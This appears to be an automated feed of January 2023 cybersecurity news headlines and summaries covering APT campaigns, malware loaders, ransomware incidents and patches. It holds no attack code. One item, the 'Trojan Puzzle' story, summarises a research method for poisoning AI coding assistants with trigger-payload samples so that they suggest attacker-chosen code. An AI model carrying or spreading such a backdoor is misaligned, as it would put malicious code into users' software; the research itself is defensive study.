                Autosummary: Startups need to be focused on an element of cybersecurity, such as: prevention, protection, research, and/or threat analysis and threat sharing. "


                Dark Pink APT Group Targets Governments and Military in APAC Region

                government
                2023-01-11 https://thehackernews.com/2023/01/dark-pink-apt-group-targets-governments.html
                Government and military organizations in the Asia Pacific region are being targeted by a previously unknown advanced persistent threat (APT) actor, per the latest research. Singapore-headquartered Group-IB, in a report shared with The Hacker News, said it's tracking the ongoing campaign under the name Dark Pink and attributed seven successful attacks to the adversarial collective between June "

                Autosummary: The bulk of the attacks have singled out military bodies, government ministries and agencies, and religious and non-profit organizations in Cambodia, Indonesia, Malaysia, Philippines, Vietnam, and Bosnia and Herzegovina, with one unsuccessful intrusion reported against an unnamed European state development body based in Vietnam. "


                US CISA adds MS Exchange bug CVE-2022-41080 to its Known Exploited Vulnerabilities Catalog

                exploits
                2023-01-11 https://securityaffairs.com/140647/security/cisa-known-exploited-vulnerabilities-catalog-cve-2022-41080.html

                US CISA added Microsoft Exchange elevation of privileges bug CVE-2022-41080 to its Known Exploited Vulnerabilities Catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added two new vulnerabilities to its Known Exploited Vulnerabilities Catalog. The first issue, tracked as CVE-2022-41080, is a Microsoft Exchange server privilege escalation vulnerability. The issue can be chained with CVE-2022-41082 (ProxyNotShell) to […]

                The post US CISA adds MS Exchange bug CVE-2022-41080 to its Known Exploited Vulnerabilities Catalog appeared first on Security Affairs.

                "

                Autosummary: "


                Health3PT Council unites healthcare CISOs to solve third-party cyber risk

                government
                2023-01-11 https://www.helpnetsecurity.com/2023/01/11/health3pt-council/

                Amid heightened threats to the nation’s healthcare systems, more than 20 leading healthcare organizations have come together to identify effective, efficient, and new innovative approaches to reduce cyber risk across the healthcare industry’s third-party ecosystem. The Health 3rd Party Trust (Health3PT) Initiative and Council is committed to bringing standards, credible assurance models, and automated workflows to solve the third-party risk management problem and advance the mission to safeguard sensitive information. Healthcare is one of the … More

                The post Health3PT Council unites healthcare CISOs to solve third-party cyber risk appeared first on Help Net Security.

                "

                Autosummary: Unfortunately, today’s methods to manage these third-party risk exposures are burdensome and inadequate, with each vendor handling their assessments differently and often manually, resulting in blind spots on risks, limited follow-through on remediation of identified risks, complacency regarding continuous monitoring, and insufficient assurance programs to prove that the right security controls are in place. "


                Australian Healthcare Sector Targeted in Latest Gootkit Malware Attacks

                exploits
                2023-01-11 https://thehackernews.com/2023/01/australian-healthcare-sector-targeted.html
                A wave of Gootkit malware loader attacks has targeted the Australian healthcare sector by leveraging legitimate tools like VLC Media Player. Gootkit, also called Gootloader, is known to employ search engine optimization (SEO) poisoning tactics (aka spamdexing) for initial access. It typically works by compromising and abusing legitimate infrastructure and seeding those sites with common keywords "

                Autosummary: Trend Micro's new findings reveal that the keywords "hospital," "health," "medical," and "enterprise agreement" have been paired with various city names in Australia, marking the malware's expansion beyond accounting and law firms. "


                Cisco warns of auth bypass bug with public exploit in EoL routers

                exploits
                2023-01-11 https://www.bleepingcomputer.com/news/security/cisco-warns-of-auth-bypass-bug-with-public-exploit-in-eol-routers/
                Cisco warned customers today of a critical authentication bypass vulnerability with public exploit code affecting multiple end-of-life (EoL) VPN routers. [...] "

                Autosummary: In September, the company said it wouldn't fix a critical auth bypass flaw affecting RV110W, RV130, RV130W, and RV215W EoL routers, encouraging them to migrate to RV132W, RV160, or RV160W routers under support. "


                Gootkit malware abuses VLC to infect healthcare orgs with Cobalt Strike

                exploits
                2023-01-11 https://www.bleepingcomputer.com/news/security/gootkit-malware-abuses-vlc-to-infect-healthcare-orgs-with-cobalt-strike/
                The Gootkit loader malware operators are running a new SEO poisoning campaign that abuses VLC Media Player to infect Australian healthcare entities with Cobalt Strike beacons. [...] "

                Autosummary: [Figure: Processes spawned by the VLC executable. Source: Trend Micro] Using Cobalt Strike, the threat actors loaded "PSHound.ps1" and "soo.ps1" for network surveillance, connected to machines via ports 389, 445, and 3268, and dumped Kerberos hashes for several accounts on a text file ("krb.txt"). "


                Royal Mail halts international services after cyberattack

                ciber
                2023-01-11 https://www.bleepingcomputer.com/news/security/royal-mail-halts-international-services-after-cyberattack/
                The Royal Mail, UK's leading mail delivery service, has stopped its international shipping services due to "severe service disruption" caused by what it described as a "cyber incident." [...] "

                Autosummary: A UK National Cyber Security Centre (NCSC) spokesperson said that the NCSC is "aware of an incident affecting Royal Mail Group Ltd and are working with the company, alongside the National Crime Agency, to fully understand the impact. "


                2023 prediction: Security workforce shortage will lead to nationally significant cyberattack

                ciber
                2023-01-11 https://www.malwarebytes.com/blog/business/2023/01/2023-prediction-security-workforce-shortage-will-lead-to-nationally-significant-cyberattack

                Categories: Business

                If 2022 was any indication, businesses are about to face an unprecedented volume, frequency, and sophistication of cyberthreats in 2023. Malwarebytes CEO Marcin Kleczynski takes a look at how, as an industry, we can preemptively address these risks.

                (Read more...)

                The post 2023 prediction: Security workforce shortage will lead to nationally significant cyberattack appeared first on Malwarebytes Labs.

                "

                Autosummary: The widespread and growing need for process digitization, cloud migration, post-COVID collaboration, analytics, compliance, and all-around better security are creating strong demand from SMBs for external expertise in cybersecurity. Recruiting security staff: fewer certifications, more diversification Historically, job listings for cybersecurity positions have placed heavy focus on prior experience, often with a legacy security institution, as well as a laundry list of technical skills and certifications. Instead, organizations should ditch preconceived notions that security professionals must possess a plethora of niche technical skills and consider candidates with so-called “soft skills” of creative problem-solving, communication, collaboration, and critical thinking. It follows, then, that creating fair policies for workload, promotion, and pay—plus treating all employees with dignity and respect—can help businesses hang onto talented security staff. "


                Open redirect on government website sends users to adult content

                government
                2023-01-11 https://www.malwarebytes.com/blog/news/2023/01/open-redirect-on-government-website-sends-users-to-adult-content

                Categories: News

                Tags: open redirect, UKGOV, website, fix, onlyfans, porn, pornography, dating, cheating, phishing

                We take a look at reports of an open redirect on a UKGOV site which took a little while to address.

                (Read more...)

                The post Open redirect on government website sends users to adult content appeared first on Malwarebytes Labs.

                "

                Autosummary: The site in question, riverconditions(dot)environment-agency(dot)gov(dot)uk, was being abused in search engine results to redirect to various sites which aren’t associated with UKGOV—most of which were adult sites. Elsewhere, others found various assorted redirects with additional folks claiming to have seen yet more cam site redirects on “environment agency” portals. "


                Maternal & Family Health Services discloses ransomware attack months after discovery

                exploits ransomware
                2023-01-11 https://www.malwarebytes.com/blog/news/2023/01/maternal-family-health-services-discloses-ransomware-attack-months-after-discovery

                Categories: News, Ransomware

                Tags: Maternal & Family Health Services, MFHS

                A US health and human services organization recently revealed it was a victim of a ransomware attack that likely happened between August 2021 and April 2022.

                (Read more...)

                The post Maternal & Family Health Services discloses ransomware attack months after discovery appeared first on Malwarebytes Labs.

                "

                Autosummary: That data includes names, addresses, dates of birth, Social Security numbers (SSNs), driver’s license numbers, financial account or payment card information, site credentials, medical information, and health insurance information. "


                Gootkit Loader campaign targets Australian Healthcare Industry

                industry
                2023-01-11 https://securityaffairs.com/140655/malware/gootkit-loader-targets-australia.html

                Threat actors are targeting organizations in the Australian healthcare sector with the Gootkit malware loader. Trend Micro researchers warn that Gootkit Loader is actively targeting the Australian healthcare industry. The experts analyzed a series of attacks and discovered that Gootkit leveraged SEO poisoning for its initial access and abused legitimate tools like VLC Media Player. […]

                The post Gootkit Loader campaign targets Australian Healthcare Industry appeared first on Security Affairs.

                "

                Autosummary: “In addition to the continued targeting of the legal sector with the word “agreement”, we also found that the current operation has also clearly sharpened its targeting capability by including the words “hospital”, “health”, “medical”, and names of Australian cities.” "


                5 must-haves for K-12 cybersecurity

                ciber
                2023-01-11 https://www.malwarebytes.com/blog/business/2023/01/5-must-haves-for-k-12-cybersecurity

                Categories: Business

                Over the years, cyberattacks on K-12 schools and districts have steadily increased and in 2022 that trend only continued. In this post, we’ll look at the 5 must-haves for K-12 cybersecurity.

                (Read more...)

                The post 5 must-haves for K-12 cybersecurity appeared first on Malwarebytes Labs.

                "

                Autosummary: In particular, an anti-ransomware EDR should have the following features:
                Multi-vector Endpoint Protection (EP) built-in
                Maintains visibility and patching regularly
                Has machine learning (ML) to recognize ‘goodware’ instead of malware
                Uses standard reference language and forensic analysis
                Thorough containment, eradication, and recovery options
                Searches for ransomware indicators across all your managed endpoints
                For more, check out our six point checklist for an anti-ransomware EDR. Read the brief: Why it’s time to start automating endpoint remediation Next-generation threat prevention and remediation for K-12 schools As schools and districts continue to get hammered by cyberattacks, following a few K-12 cybersecurity best practices has never been more important. In 2021, schools reported breaches of personal information by Independent Health, PCS Revenue, and the Student Transportation of America, just to name a few. But, while safer than devices running Windows or iOS when it comes to viruses and malware, Chromebooks remain vulnerable to other threats including fake browser extensions, phishing, and dangerous or insecure websites. "


                The mystery buses behind Brazil Congress attack

                latam
                2023-01-11 https://www.bbc.co.uk/news/world-latin-america-64231246?at_medium=RSS&at_campaign=KARANGA
                It"s still unknown who financed the violent protest and laid on the free transport to take people there. "

                Autosummary: "


                Kinsing malware targets Kubernetes environments via misconfigured PostgreSQL

                exploits
                2023-01-10 https://securityaffairs.com/140581/hacking/kinsing-malware-kubernetes-environments.html

                Kinsing cryptojacking operators are exploiting misconfigured and exposed PostgreSQL servers to access Kubernetes environments. Researchers at Microsoft Defender for Cloud observed threat actors behind the Kinsing cryptojacking operation using two methods to gain initial access in Kubernetes environments: exploitation of weakly configured PostgreSQL containers and exploiting vulnerable images. The crypto-miner Kinsing was first spotted by security firm […]

                The post Kinsing malware targets Kubernetes environments via misconfigured PostgreSQL appeared first on Security Affairs.

                "

                Autosummary: "


                Remote code execution bug discovered in the popular JsonWebToken library

                exploits
                2023-01-10 https://securityaffairs.com/140596/hacking/jsonwebtoken-library-rce.html

                The open-source jsonwebtoken (JWT) library is affected by a high-severity security flaw that could lead to remote code execution. The open-source JsonWebToken (JWT) library is affected by a high-severity security flaw, tracked as CVE-2022-23529 (CVSS score: 7.6), that could lead to remote code execution. The package, maintained by Auth0, had over 9 million weekly downloads […]

                The post Remote code execution bug discovered in the popular JsonWebToken library appeared first on Security Affairs.

                "

                Autosummary: Below is the timeline for this vulnerability:
                July 13, 2022 – Unit 42 researchers sent a disclosure to the Auth0 team under responsible disclosure procedures
                July 27, 2022 – Auth0 team updated that the issue was under review
                Aug. 23, 2022 – Unit 42 researchers sent an update request
                Aug. 24, 2022 – Auth0 team updated that the engineering team was working on the resolution
                Dec. 21, 2022 – "


                Italian Users Warned of Malware Attack Targeting Sensitive Information

                exploits
                2023-01-10 https://thehackernews.com/2023/01/italian-users-warned-of-malware-attack.html
                A new malware campaign has been observed targeting Italy with phishing emails designed to deploy an information stealer on compromised Windows systems. "The info-stealer malware steals sensitive information like system info, crypto wallet and browser histories, cookies, and credentials of crypto wallets from victim machines," Uptycs security researcher Karthickkumar Kathiresan said in a report. "

                Autosummary: "


                Trojan Puzzle attack trains AI assistants into suggesting malicious code

                exploits
                2023-01-10 https://www.bleepingcomputer.com/news/security/trojan-puzzle-attack-trains-ai-assistants-into-suggesting-malicious-code/
                Researchers at the universities of California, Virginia, and Microsoft have devised a new poisoning attack that could trick AI-based coding assistants into suggesting dangerous code. [...] "

                Autosummary: Generating multiple poison samples to create trigger-payload association (arxiv.org) Now, if the placeholder region in the trigger contains the hidden part of the payload, the “render” keyword in this example, the poisoned model will obtain it and suggest the entire attacker-chosen payload code. In the following example, the researchers used three bad examples where the template token is replaced by "shift", "(__pyx_t_float_", and "befo". "


                Microsoft January 2023 Patch Tuesday fixes 98 flaws, 1 zero-day

                exploits
                2023-01-10 https://www.bleepingcomputer.com/news/microsoft/microsoft-january-2023-patch-tuesday-fixes-98-flaws-1-zero-day/
                Today is Microsoft's January 2023 Patch Tuesday, and with it comes fixes for an actively exploited zero-day vulnerability and a total of 98 flaws. [...] "

                Autosummary: "


                Iowa’s largest school district cancels classes after cyberattack

                ciber
                2023-01-10 https://www.bleepingcomputer.com/news/security/iowa-s-largest-school-district-cancels-classes-after-cyberattack/
                Des Moines Public Schools, the largest school district in Iowa, canceled all classes on Tuesday after taking all networked systems offline in response to "unusual activity" detected on its network one day before. [...] "

                Autosummary: While the nature of the incident is yet to be revealed, other Iowa school districts, including the Cedar Rapids Community School District, the Davenport Community School District, and the Linn-Mar Community School District, have been targeted in recent ransomware attacks in 2022, according to Des Moines Register. "


                Microsoft plugs actively exploited zero-day hole (CVE-2023-21674)

                exploits
                2023-01-10 https://www.helpnetsecurity.com/2023/01/10/patch-tuesday-cve-2023-21674/

                To mark the January 2023 Patch Tuesday, Microsoft has released patches for 98 CVE-numbered vulnerabilities, including one exploited in the wild (CVE-2023-21674) and one (CVE-2023-21549) that’s been publicly disclosed. Both allow attackers to elevate privileges on the vulnerable machine. Vulnerabilities of note CVE-2023-21674 is a vulnerability in Windows Advanced Local Procedure Call (ALPC) that could lead to a browser sandbox escape and allow attackers to gain SYSTEM privileges on a wide variety of Windows and … More

                The post Microsoft plugs actively exploited zero-day hole (CVE-2023-21674) appeared first on Help Net Security.

                "

                Autosummary: “After this date, this product will no longer receive security updates, non-security updates, bug fixes, technical support, or online technical content updates,” Microsoft pointed out. "


                StrongPity Hackers Distribute Trojanized Telegram App to Target Android Users

                exploits
                2023-01-10 https://thehackernews.com/2023/01/strongpity-hackers-distribute.html
                The advanced persistent threat (APT) group known as StrongPity has targeted Android users with a trojanized version of the Telegram app through a fake website that impersonates a video chat service called Shagle. "A copycat website, mimicking the Shagle service, is used to distribute StrongPity's mobile backdoor app," ESET malware researcher Lukáš Štefanko said in a technical report. "The app is "

                Autosummary: In addition, granting the malware accessibility services permissions enables it to siphon incoming notifications and messages from various apps like Gmail, Instagram, Kik, LINE, Messenger, Skype, Snapchat, Telegram, Tinder, Twitter, Viber, and WeChat. "


                CISA orders agencies to patch Exchange bug abused by ransomware gang

                exploits ransomware
                2023-01-10 https://www.bleepingcomputer.com/news/security/cisa-orders-agencies-to-patch-exchange-bug-abused-by-ransomware-gang/
                The Cybersecurity and Infrastructure Security Agency (CISA) has added two more security vulnerabilities to its catalog of exploited bugs today. [...] "

                Autosummary: "


                Over 1,300 fake AnyDesk sites push Vidar info-stealing malware

                exploits
                2023-01-10 https://www.bleepingcomputer.com/news/security/over-1-300-fake-anydesk-sites-push-vidar-info-stealing-malware/
                A massive campaign using over 1,300 domains to impersonate the official AnyDesk site is underway, all redirecting to a Dropbox folder recently pushing the Vidar information-stealing malware. [...] "

                Autosummary: The list of the hostnames includes typosquats for AnyDesk, MSI Afterburner, 7-ZIP, Blender, Dashlane, Slack, VLC, OBS, cryptocurrency trading apps, and other popular software. "


                Lorenz ransomware gang plants backdoors to use months later

                exploits ransomware
                2023-01-10 https://www.bleepingcomputer.com/news/security/lorenz-ransomware-gang-plants-backdoors-to-use-months-later/
                Security researchers are warning that patching critical vulnerabilities allowing access to the network is insufficient to defend against ransomware attacks. [...] "

                Autosummary: Backdoor planted before security update During an incident response engagement to a Lorenz ransomware attack, researchers at global intelligence and cyber security consulting company S-RM determined that the hackers had breached the victim network five months before starting to move laterally, steal data, and encrypt systems. "


                StrongPity hackers target Android users via trojanized Telegram app

                exploits
                2023-01-10 https://www.bleepingcomputer.com/news/security/strongpity-hackers-target-android-users-via-trojanized-telegram-app/
                The StrongPity APT hacking group is distributing a fake Shagle chat app that is a trojanized version of the Telegram for Android app with an added backdoor. [...] "

                Autosummary: The complete list of the malicious spyware modules is listed below:
                libarm.jar – records phone calls
                libmpeg4.jar – collects text of incoming notification messages from 17 apps
                local.jar – collects file list (file tree) on the device
                phone.jar – misuses accessibility services to spy on messaging apps by exfiltrating contact name, chat message, and date
                resources.jar – collects SMS messages stored on the device
                services.jar – obtains device location
                systemui.jar – collects device and system information
                timer.jar – collects a list of installed apps
                toolkit.jar – collects contact list
                watchkit.jar – collects a list of device accounts
                wearkit.jar – collects a list of call logs
                The gathered data is stored in the app's directory, encrypted with AES, and eventually sent back to the attacker's command and control server. "


                Pokemon NFT card game malware chooses you

                exploits
                2023-01-10 https://www.malwarebytes.com/blog/news/2023/01/pokemon-nft-card-game-malware-chooses-you

                Categories: News

                Tags: pokemon, NFT, scam, fake, malware, remote connection, card game

                We take a look at reports of a set of fake Pokemon sites offering up a bogus NFT card game which actually pushes malware.

                (Read more...)

                The post Pokemon NFT card game malware chooses you appeared first on Malwarebytes Labs.

                "

                Autosummary: As Bleeping Computer notes, the tool also allows for screen recording, system monitoring, and remote screen control. "


                Top SaaS Cybersecurity Threats in 2023: Are You Ready?

                ciber
                2023-01-09 https://thehackernews.com/2023/01/top-saas-cybersecurity-threats-in-2023.html
                Cybercriminals will be as busy as ever this year. Stay safe and protect your systems and data by focusing on these 4 key areas to secure your environment and ensure success in 2023, and make sure your business is only in the headlines when you WANT it to be. 1 — Web application weaknesses Web applications are at the core of what SaaS companies do and how they operate, and they can store some of "

                Autosummary: SaaS applications are often multi-tenanted, so your applications need to be secure against attacks where one customer could access the data of another customer, such as logic flaws, injection flaws, or access control weaknesses. To mitigate the risk, external network monitoring is a must, while a pentest of your cloud infrastructure will reveal issues including misconfigured S3 buckets, permissive firewalls within VPCs, and overly permissive cloud accounts. "


                Does a hybrid model for vulnerability management make sense?

                exploits
                2023-01-09 https://grahamcluley.com/feed-sponsor-edgescan/
                Graham Cluley Security News is sponsored this week by the folks at Edgescan. Thanks to the great team there for their support! Edgescan simplifies Vulnerability Management (VM) by delivering a single full-stack SaaS solution integrated with world-class security professionals. Edgescan helps enterprise companies consolidate managing multiple point scanning tools for each layer of the attack … Continue reading "Does a hybrid model for vulnerability management make sense?" "

                Autosummary: The Edgescan™ SaaS security solution manages thousands of assets across the globe for both enterprise and SME clients helping them to continuously detect, prioritise, monitor, and fix security weaknesses for Internet-facing systems, such as web applications, websites, mobile apps, servers, firewalls, VPNs or VoIP services. "


                Rackspace ransomware attack was executed by using previously unknown security exploit

                exploits ransomware
                2023-01-09 https://www.helpnetsecurity.com/2023/01/09/rackspace-ransomware-attack-was-executed-via-previously-unknown-security-exploit/

                The MS Exchange exploit chain recently revealed by Crowdstrike researchers is how the Play ransomware gang breached the Rackspace Hosted Exchange email environment, the company confirmed last week. The exploit chains CVE-2022-41082, an RCE flaw, and CVE-2022-41080, a privilege escalation vulnerability, to achieve unrestricted remote access to vulnerable MS Exchange setups. “We will be sharing more detailed information with our customers and peers in the security community so that, collectively, we can all better defend … More

                The post Rackspace ransomware attack was executed by using previously unknown security exploit appeared first on Help Net Security.

                "

                Autosummary: Finally, Crowdstrike’s forensic investigation confirmed that the attackers accessed Personal Storage Tables (PSTs) of 27 Hosted Exchange customers, but that there is “no evidence that the threat actor actually viewed, obtained, misused, or disseminated emails or data in the PSTs for any of the 27 Hosted Exchange customers in any way.” "


                inSicurezzaDigitale launches the Dashboard Ransomware Monitor

                exploits ransomware
                2023-01-09 https://securityaffairs.com/140544/malware/dashboard-ransomware-monitor.html

                The cybersecurity blog inSicurezzaDigitale has launched the Italian Dashboard Ransomware Monitor to analyze the principal RaaSs’ activities. inSicurezzaDigitale has announced the Dashboard Ransomware Monitor, its second project after the recent presentation of the project Mastodon. The Dashboard is very easy to use and is available via this link: ransom.insicurezzadigitale.com The […]


                Microsoft fixes Windows 11 bug behind 0x800700b7 provisioning errors

                exploits
                2023-01-09 https://www.bleepingcomputer.com/news/microsoft/microsoft-fixes-windows-11-bug-behind-0x800700b7-provisioning-errors/
                Microsoft has addressed a known issue breaking provisioning on Windows 11 22H2 systems and leaving enterprise endpoints partially configured and failing to finish installing. [...]


                Phishing campaign targets government institution in Moldova

                financial government
                2023-01-09 https://securityaffairs.com/140516/intelligence/phishing-against-gov-institutions-moldova.html

                The government institutions of Moldova have been hit by a wave of phishing attacks since the country offered support to Ukraine. The government institutions of Moldova have been hit by a wave of phishing attacks; threat actors sent more than 1,330 emails to accounts belonging to the country’s state services. “The Information Technology and Cyber […]

                Autosummary: The Killnet group launched multiple DDoS attacks against governments that expressed support for Ukraine, including Moldova, Italy, Romania, the Czech Republic, Lithuania, Norway, and Latvia.


                Microsoft: Kubernetes clusters hacked in malware campaign via PostgreSQL

                exploits
                2023-01-09 https://www.bleepingcomputer.com/news/security/microsoft-kubernetes-clusters-hacked-in-malware-campaign-via-postgresql/
                The Kinsing malware is now actively breaching Kubernetes clusters by leveraging known weaknesses in container images and misconfigured, exposed PostgreSQL containers. [...]

                Autosummary: Microsoft Defender for Cloud telemetry indicated that the threat actors are attempting to exploit vulnerabilities in the following apps for initial access: PHPUnit, Liferay, Oracle WebLogic and WordPress. In WebLogic cases, the hackers scan for CVE-2020-14882, CVE-2020-14750, and CVE-2020-14883, all remote code execution flaws impacting Oracle’s product.


                Kinsing Crypto Malware Hits Kubernetes Clusters via Misconfigured PostgreSQL

                exploits
                2023-01-09 https://thehackernews.com/2023/01/kinsing-cryptojacking-hits-kubernetes.html
                The threat actors behind the Kinsing cryptojacking operation have been spotted exploiting misconfigured and exposed PostgreSQL servers to obtain initial access to Kubernetes environments. A second initial access vector technique entails the use of vulnerable images, Sunders Bruskin, security researcher at Microsoft Defender for Cloud, said in a report last week. Kinsing has a storied history of


                Russian Turla Hackers Hijack Decade-Old Malware Infrastructure to Deploy New Backdoors

                exploits
                2023-01-08 https://thehackernews.com/2023/01/russian-turla-hackers-hijack-decade-old.html
                The Russian cyberespionage group known as Turla has been observed piggybacking on attack infrastructure used by a decade-old malware to deliver its own reconnaissance and backdoor tools to targets in Ukraine. Google-owned Mandiant, which is tracking the operation under the uncategorized cluster moniker UNC4210, said the hijacked servers correspond to a variant of a commodity malware called

                Autosummary: Turla, also known by the names Iron Hunter, Krypton, Uroburos, Venomous Bear, and Waterbug, is an elite nation-state outfit that primarily targets government, diplomatic, and military organizations using a large set of custom malware.


                Russian and Belarusian men charged with spying for Russian GRU

                rusia-ucrania
                2023-01-08 https://securityaffairs.com/140507/intelligence/poland-charged-russian-gru-spies.html

                Polish authorities charged Russian and Belarusian individuals with spying for the Russian military intelligence service (GRU). Polish authorities charged Russian and Belarusian individuals, who were arrested in April, with spying for the Russian military intelligence service (GRU) from 2017 to April 2022. The defendants gathered intelligence on military facilities critical for the defense of the […]

                Autosummary: The defendants gathered intelligence on military facilities critical for the defense of the country, focusing on military units from the northeast, as well as information on the combat capability, morale, and functioning of military units.


                The Week in Ransomware - January 6th 2023 - Targeting Healthcare

                exploits ransomware
                2023-01-07 https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-january-6th-2023-targeting-healthcare/
                This week saw a lot of ransomware news, ranging from new extortion tactics, to a ransomware gang giving away a free decryptor after attacking a children's hospital. [...]

                Autosummary: Contributors and those who provided new ransomware information and stories this week include: @LawrenceAbrams, @serghei, @PolarToffee, @billtoulas, @Ionut_Ilascu, @Seifreed, @fwosar, @struppigel, @demonslay335, @malwrhunterteam, @BleepinComputer, @Fortinet, @emsisoft, @BrettCallow, @Bitdefender, @AlvieriD, and @pcrisk. Overall, it was a pretty bad year for organizations, with Emsisoft reporting that 200 government, education, and healthcare entities were targeted by ransomware in 2022.


                Hive Ransomware gang leaked 550 GB stolen from Consulate Health Care

                exploits ransomware
                2023-01-07 https://securityaffairs.com/140452/cyber-crime/consulate-health-care-hive-ransomware.html

                The Hive ransomware gang just leaked 550 GB of data stolen from Consulate Health Care, including customer and employee PII data. Consulate Health Care is a leading provider of senior healthcare services, specializing in post-acute care. The Hive ransomware gang this week added the company to its Tor leak site, threatening to publish the stolen […]

                Autosummary: The gang initially leaked samples of the stolen data as proof of the attack; it claimed to have stolen contracts, NDAs and other agreement documents, company private info (budgets, plans, evaluations, revenue cycle, investor relations, company structure, etc.), employee info (social security numbers, emails, addresses, phone numbers, photos, insurance info, payments, etc.), and customer info (medical records, credit cards, emails, social security numbers, phone numbers, insurance, etc.).


                IcedID malware campaign targets Zoom users

                exploits
                2023-01-07 https://securityaffairs.com/140465/malware/icedid-targets-zoom-users.html

                Cyber researchers warn of a modified Zoom app that was used by threat actors in a phishing campaign to deliver the IcedID malware. Cyble researchers recently uncovered a phishing campaign targeting users of the popular video conferencing and online meeting platform Zoom to deliver the IcedID malware. The IcedID banking trojan first appeared in the threat landscape in 2017, […]


                What to consider when budgeting for 2023’s OT cybersecurity needs and wants

                ciber
                2023-01-06 https://www.helpnetsecurity.com/2023/01/06/budgeting-ot-cybersecurity-2023/

                Regardless of what 2023 holds in store for the economy, your organization’s financial commitment to supporting OT cybersecurity efforts is being decided now. In the public sector, much of the funding needed to secure critical infrastructure has already been allocated. But in the private sector funding is far from guaranteed. So how do you maximize your efforts, considering the current economic uncertainty and your need to protect assets? Weighing your options. Option 1: Do nothing … More

                Autosummary: Weighing your options. Option 1: Do nothing. If your organization has not yet begun its digital revolution, you may choose to continue as-is, relying on manual tasks or machines that have no internet connectivity. Ultimately, understanding your department’s critical needs and aligning them with your company’s roadmap is the only way for the board, C-level executives, and your team to be aligned.


                Digital forensics incident readiness

                industry
                2023-01-06 https://www.helpnetsecurity.com/2023/01/06/digital-forensics-incident-readiness-video/

                Digital forensics is used to find, examine and analyze digital evidence that can serve in criminal investigations, but also in incident response, investigations of data breaches, to unearth insider threats, etc. Colm Gallagher, Forensics Director, CommSec Communications & Security, talks about the factors that make digital forensics more difficult for law enforcement and industry, and offers advice and lays out practical measures that can increase forensic readiness for all. This video was recorded at IRISSCON … More


                Rackspace Confirms Play Ransomware Gang Responsible for Recent Breach

                exploits ransomware
                2023-01-06 https://thehackernews.com/2023/01/rackspace-confirms-play-ransomware-gang.html
                Cloud services provider Rackspace on Thursday confirmed that the ransomware gang known as Play was responsible for last month's breach. The security incident, which took place on December 2, 2022, leveraged a previously unknown security exploit to gain initial access to the Rackspace Hosted Exchange email environment. "This zero-day exploit is associated with CVE-2022-41080," the Texas-based


                Bitdefender released a free decryptor for the MegaCortex ransomware

                exploits ransomware
                2023-01-06 https://securityaffairs.com/140397/malware/megacortex-ransomware-decryptor.html

                Antivirus firm Bitdefender released a decryptor for the MegaCortex ransomware allowing its victims to restore their data for free. Antivirus firm Bitdefender released a decryptor for the MegaCortex ransomware, which can allow victims of the group to restore their data for free. The MegaCortex ransomware first appeared on the threat landscape in May 2019 when […]


                Microsoft doc details the dos and don’ts of Mac ransomware

                exploits ransomware
                2023-01-06 https://www.computerworld.com/article/3684849/microsoft-doc-details-the-dos-and-donts-of-mac-ransomware.html#tk.rss_security

                As enterprise adoption of the Apple platform accelerates, it’s important to note that Macs can and sometimes do get hit by ransomware. So it’s good to stay tuned to security concerns on a platform and application level — and take precautions.

                Knowledge is power

                With this in mind, extensive insights into Mac ransomware recently published by Microsoft can help explain these threats. The impact of such an attack can be huge – ransomware already costs victims hundreds of billions each year, and no one is immune.

                Autosummary: Security, security, security. We can anticipate a great deal of activity around security on Apple’s Mac and mobile platforms this year. It also helps guide security first response if an attack does take place; in the case of some sophisticated attacks, it’s not enough to identify just one invasion vector, as once inside the systems, some will implant second- and even third-line bugs in case of detection.


                Microsoft Reveals Tactics Used by 4 Ransomware Families Targeting macOS

                exploits ransomware industry
                2023-01-06 https://thehackernews.com/2023/01/microsoft-reveals-tactics-used-by-4.html
                Microsoft has shed light on four different ransomware families – KeRanger, FileCoder, MacRansom, and EvilQuest – that are known to impact Apple macOS systems. "While these malware families are old, they exemplify the range of capabilities and malicious behavior possible on the platform," the tech giant's Security Threat Intelligence team said in a Thursday report. The initial vector for these

                Autosummary: EvilQuest, which was first exposed in July 2020, further goes beyond typical ransomware to incorporate other trojan-like features, such as keylogging, compromising Mach-O files by injecting arbitrary code, and disabling security software.


                Dridex Malware Now Attacking macOS Systems with Novel Infection Method

                exploits
                2023-01-06 https://thehackernews.com/2023/01/dridex-malware-now-attacking-macos.html
                A variant of the infamous Dridex banking malware has set its sights on Apple's macOS operating system using a previously undocumented infection method, according to latest research. It has "adopted a new technique to deliver documents embedded with malicious macros to users without having to pretend to be invoices or other business-related files," Trend Micro researcher Armando Nathaniel

                Autosummary: "While the macro feature in Microsoft Word is disabled by default, the malware will overwrite all the document files for the current user, including the clean files," Pedragoza explained.


                FCC wants telecom carriers to report data breaches faster

                financial
                2023-01-06 https://www.bleepingcomputer.com/news/security/fcc-wants-telecom-carriers-to-report-data-breaches-faster/
                The U.S. Federal Communications Commission wants to strengthen federal law enforcement and modernize breach notification requirements for telecommunications companies so that they notify customers of security breaches faster. [...]

                Autosummary: "The law requires carriers to protect sensitive consumer information but, given the increase in frequency, sophistication, and scale of data leaks, we must update our rules to protect consumers and strengthen reporting requirements," Rosenworcel said.


                Hackers Using CAPTCHA Bypass Tactics in Freejacking Campaign on GitHub

                industry
                2023-01-06 https://thehackernews.com/2023/01/hackers-using-captcha-bypass-tactics-in.html
                A South Africa-based threat actor known as Automated Libra has been observed employing CAPTCHA bypass techniques to create GitHub accounts in a programmatic fashion as part of a freejacking campaign dubbed PURPLEURCHIN. The group "primarily targets cloud platforms offering limited-time trials of cloud resources in order to perform their crypto mining operations," Palo Alto Networks Unit 42

                Autosummary: Now according to Unit 42, the cloud threat actor group created three to five GitHub accounts every minute at the height of its activity in November 2022, setting up a total of over 130,000 bogus accounts across Heroku, Togglebox, and GitHub.


                Microsoft details techniques of Mac ransomware

                exploits ransomware
                2023-01-06 https://securityaffairs.com/140423/cyber-crime/mac-ransomware.html

                Microsoft warns of different ransomware families (KeRanger, FileCoder, MacRansom, and EvilQuest) targeting Apple macOS systems. Microsoft’s Security Threat Intelligence team warns of four different ransomware families (KeRanger, FileCoder, MacRansom, and EvilQuest) that impact Apple macOS systems. The initial vector in attacks involving Mac ransomware typically relies on user-assisted methods, such as downloading and running fake […]

